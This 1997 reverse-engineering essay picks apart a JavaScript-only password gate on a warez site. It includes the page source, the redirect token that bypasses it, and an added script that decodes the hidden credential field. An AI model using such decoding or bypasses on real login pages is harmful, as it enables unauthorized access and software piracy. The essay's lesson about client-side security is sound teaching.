Webpages source fishing
Javascript "protections"
by jcr
(08 September 1997)
Courtesy of Fravia's page of reverse engineering
Well, this is a VERY interesting essay, in my opinion... see, if you have
a look at my antismut pages, you'll see that one of them
is dedicated to the gathering of tiny information snippets that are
frequently "forgotten"
inside the html source code of many pages. I have personally destroyed many
sites using that information. You may need some other tools: a java decompiler
(in order to disassemble java compiled code, duh) and a "classviewer" (and a java virtual machine
of course) in order to practise this kind of nice activity... in the meantime
you'll have your fun just examining the source code of all "suspect" pages, as
jcr teaches us with this very interesting example of a stupid web protection. Here is what he wrote to me:

fravia: i came across this web protection that made me laugh, and
then cry. It's just dumb, dumb dumb dumb.
And the most saddening aspect is that the guy does have a brain,
because the code is interesting.
It's like shorting out a terribly complex copy protection scheme
with a silly simple jmp.
jcr (j, seer of the code)
A candidate for the stupidest (web-based) protection scheme:
I'm sorry if this is not appropriate material, but i just had to document
this blatant misuse of a brain (such a terrible thing to waste!).
This is not at all a crack, and has nothing to do with disassembly language,
but it is the st00pidest implementation of "security" on the web i have ever
seen.
While i was pursuing our beloved softice 3.2 (yes 3.2), walking the
warez road for all its sin, (i'd buy the damn thing but i haven't
scrounged up a bleeding cent towards the 559$US or so needed, this hacking
gig isn't putting down the bills, you catch?) anyway, i came across this
silly little site at:
http://www.octonline.com/usr/fity07/main.htm
(which does NOT host THE debugger)
the story, as the author writes, is that you have to click on these ad
banners, muck around through all this bullshit commercialization, and find
a keyphrase (uh-oh) in order to enter the warez site.
I'm not into that, i don't like that, so i won't do that.
I hit the warez site, and sure enough am presented with a form asking me to
login.
Let's see first of all if there is anything in the markup that i can use to
my advantage: (please excuse: here is the markup in its entirety):
pwd.htm:
<HTML><HEAD>
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide from JavaScript-Impaired Browsers
al="`1234567890-=~!@#$%^&*()_+qwer"
+"tyuiop[]QWERTYUIOP{}|asdfghjkl;A"
+"SDFGHJKL:zxcvbnm,./ZXCVBNM<>?";
ab1="";
bctr=0;
function ckPwd(){
tst=document.isn.username.value
+"*"+document.isn.passwrd.value+"*";
ls=document.pd.pe.value;
a=eval(ls.substring(0,2))-91;
ls=ls.substring(2,ls.length);
nls="";
flg=0;
while (ls.length>12){
ab=eval(ls.substring(0,2))-89;
ab1=(ab1==""?""+ab:ab1);
oab1=ab1;
ls=ls.substring(2,ls.length);
for (var i=0;i<ab;i++){
nr=eval(ls.substring(0,2))-a;
ls=ls.substring(2,ls.length);
nls+=al.charAt(nr);
}
nls+="*";
if (nls.indexOf(tst)>-1){
ls="";
flg=1;
}
}
if (flg==1){
tstOk();
}
else{
bctr++;
if (bctr>3){
/* Be sure to put the name of the page
here to which you want visitors are to be
sent after three tries if they FAIL to enter
a correct password and user name. */
location.href="error.htm";
}
else{
alert("Sorry. Bad Username or Password."
+" Failed Attempt #"+bctr+".");
}
}
}
function tstOk(){
ab1=ab1+""+a;
alert("OK. You Entered a Valid Username and Password, "
+document.isn.username.value+"! Taking you to the"
+" restricted page as soon as you click OK.");
location.href="pwdss.htm?"+ab1; <---- gee, thats sweet
}
function srand() {
today=new Date();
rand=today.getTime();
picker=""+rand
picker=picker.charAt((picker.length-4));
rec=eval(picker);
} // End Hiding --> </SCRIPT> </HEAD> <BODY BGCOLOR="white"><CENTER>
<FORM NAME="pd">
<!-- IMPORTANT: After you run the pseudo-encrypter, you will get a
"hidden" form element constructed especially for your own user names and
passwords. Paste that form element right below this note and above the end
of form tag. -->
<!-- Paste this element into your main script named pwd.htm in the
location indicated -->
<INPUT TYPE='hidden' NAME='pe'
VALUE='999881643741603841598498816759606041815967 '> </FORM>
<!-- You may put any page content you wish here The HTML below for the
password entry is presently set for blue background and white type. You
may change colors to fit your own page design without impacting on the
script, so long as the form elements stay the same. -->
<FORM NAME="isn">
<TABLE BORDER=2 CELLPADDING=5 CELLSPACING=0 BGCOLOR=BLUE>
<TR><TD COLSPAN=2 ALIGN=CENTER><FONT SIZE=4 COLOR=WHITE
FACE="helvetica,arial,geneva"><B>Password Access<BR>to Our Restricted
Pages</B></FONT></TD></TR>
<TR><TD><FONT SIZE=3 COLOR=WHITE><B>Your User Name:</B></FONT></TD>
<TD><INPUT TYPE="text" NAME="username" VALUE="" SIZE=10></TD></TR>
<TR><TD><FONT SIZE=3 COLOR=WHITE><B>Your Password:</B></FONT></TD>
<TD><INPUT TYPE="password" NAME="passwrd" VALUE="" SIZE=10></TD></TR>
<TR><TD COLSPAN=2 ALIGN=CENTER><INPUT TYPE="button" NAME="btn"
VALUE=" Submit " onClick="ckPwd();return false;"></TD></TR>
</TABLE></FORM>
<!-- Put any other content you wish on your page here -->
<SCRIPT LANGUAGE="JavaScript">
<!-- Hide JavaScript from Java-Impaired Browsers
/* This little script at the bottom of your
page isn't strictly necessary, but it does
put the visitor's cursor in the password form.
It's a small, but polite and thoughtful thing
to do for your visitors. */
document.isn.username.focus();
// End Hiding -->
</SCRIPT>
</BODY>
</HTML>
And here is the effect.
The whole thing reminds me so much of deprotecting and otherwise
reengineering, that i couldn't help but think of fravia and the stupid
protectionists page. (or is that just "stupid protections" page?) anyways,
right there, right in the middle of the markup i stare at a link to the
following scrap of markup:
pwdss.htm:
<!-- Create this intervening page named "pwdss.htm" to help keep the
restricted page URL a bit more difficult to discern. -->
<HTML><HEAD><SCRIPT LANGUAGE="JavaScript">
ck=location.search;
if (ck!="?98"){
/* Substitute your own WRONG
destination here. */
location.href="error.htm"; <-- Wanna this page
}
else{
/* Put the correct restricted
page name here. */
location.href="waret.htm"; <-- or rather this one?
}
</SCRIPT></HEAD></HTML>
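As an added example (this is not jcr's code and not the site's code), the JavaScript below re-implements, outside the browser, the walk that ckPwd() in pwd.htm performs over the hidden pe field: the character table al and the field value are copied from the page above (trailing space included), nothing else is assumed. Running it recovers the credential records the page accepts and the query token that tstOk() appends to pwdss.htm, which is exactly the information "view source" hands to anyone. The function names (decodePe, acceptsLogin, makeReader) are the example's own.

```javascript
// Added example: offline decoder for the "pseudo-encrypted" hidden field in pwd.htm.
// Everything needed to decode it ships to the visitor inside the page itself.

// Character table "al", copied verbatim from pwd.htm.
const AL =
  "`1234567890-=~!@#$%^&*()_+qwer" +
  "tyuiop[]QWERTYUIOP{}|asdfghjkl;A" +
  "SDFGHJKL:zxcvbnm,./ZXCVBNM<>?";

// Hidden field value exactly as it appears in pwd.htm (including the trailing space).
const PE_FROM_PAGE = "999881643741603841598498816759606041815967 ";

// Cursor over the digit string. The page reads two characters at a time with eval();
// parseInt(pair, 10) gives the same number for plain decimal pairs without running text.
function makeReader(s) {
  let pos = 0;
  return {
    remaining: () => s.length - pos,
    next() {
      const pair = s.slice(pos, pos + 2);
      const n = parseInt(pair, 10);
      if (pair.length < 2 || Number.isNaN(n)) {
        throw new Error("bad two-digit group: " + JSON.stringify(pair));
      }
      pos += 2;
      return n;
    },
  };
}

// Layout implied by ckPwd(): first pair minus 91 is a global offset ("a"); then each record
// is a length pair minus 89 ("ab") followed by that many pairs, each an index into AL shifted
// by the offset. Records are joined with "*" into the haystack the login test searches.
function decodePe(pe) {
  const r = makeReader(pe);
  const offset = r.next() - 91;
  const words = [];
  let firstLen = null; // "ab1" on the page: taken from the first record only
  while (r.remaining() > 12) { // same loop condition as ckPwd()
    const count = r.next() - 89;
    if (firstLen === null) firstLen = count;
    let word = "";
    for (let i = 0; i < count; i++) word += AL.charAt(r.next() - offset);
    words.push(word);
  }
  return {
    offset,
    words,
    haystack: words.map((w) => w + "*").join(""), // "nls" as ckPwd() builds it
    token: String(firstLen) + String(offset), // tstOk(): "pwdss.htm?" + ab1 + a
  };
}

// The acceptance test from ckPwd(): username + "*" + password + "*" must occur somewhere in
// the haystack. It is a substring search, not a comparison of whole records.
function acceptsLogin(pe, username, password) {
  const needle = username + "*" + password + "*";
  return decodePe(pe).haystack.indexOf(needle) > -1;
}

const decoded = decodePe(PE_FROM_PAGE);
console.log("records in pe:", decoded.words);
console.log("redirect after success:", "pwdss.htm?" + decoded.token);
```

Two things fall out of running it. The token is "98", which is the literal string pwdss.htm compares location.search against, so the decoder reproduces the whole client-side chain; and because ckPwd() uses indexOf rather than an equality test on a record, any suffix of the first record, including the empty username, passes together with the second record's value. Both facts are checkable from the two pages alone; no request to the site is needed.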
The moral of this sad tale is: don't waste your time coercing your markup
language to implement security. IT WON'T DO, YOU CANNOT HIDE BEHIND
YOUR JAVASCRIPT, NOR YOUR JAVA CLASS, NOR YOUR ACTIVE-X. If the
protectionist's code must live on a host, it will never be secure.
Sad to say, this protection would be secure only to the most naive
web-idiot ("uhh, what's 'view source'... an option?")
Or: don't confuse obscurity and obfuscation with security.
j, seer of the code.
ps: or maybe i'm just the rare sort that happens to source the majority
of the web pages encountered... and for that matter... of the programs
encountered ;-)
(c) jcr, 1997. All rights reversed.